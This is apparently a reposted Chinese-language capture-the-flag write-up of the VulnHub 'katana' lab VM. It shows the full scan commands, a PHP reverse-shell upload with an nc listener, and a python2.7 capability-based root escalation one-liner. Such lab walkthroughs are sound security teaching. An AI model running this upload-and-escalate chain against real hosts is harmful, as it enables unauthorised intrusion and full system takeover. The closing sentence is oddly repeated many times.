vulnhub之katana的实践

admin 2023年7月24日11:58:00评论18 views字数 768阅读2分33秒阅读模式

今天实践的是vulnhub的katana镜像,

下载地址,https://download.vulnhub.com/katana/katana.zip,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.177.0/24,

获取到靶机地址192.168.177.148,

vulnhub之katana的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.148,

vulnhub之katana的实践

8088端口有web服务,做html路径扫描,

dirb http://192.168.177.148:8088/ -X .html,

vulnhub之katana的实践

获取到http://192.168.177.148:8088/upload.html,浏览器访问,

vulnhub之katana的实践

在kali攻击机上准备php-reverse-shell.php文件,上传,

vulnhub之katana的实践

kali攻击机上准备好反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.177.148:8715/katana_php-reverse-shell.php,获取到了反弹shell,

不是root,需要提权,

搜索设置了capabilities的可执行文件,getcap -r / 2>/dev/null,

用python2.7进行提权,

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")',

id确认是root,

vulnhub之katana的实践

本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束。

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之katana的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月24日11:58:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之katana的实践https://cn-sec.com/archives/1900676.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息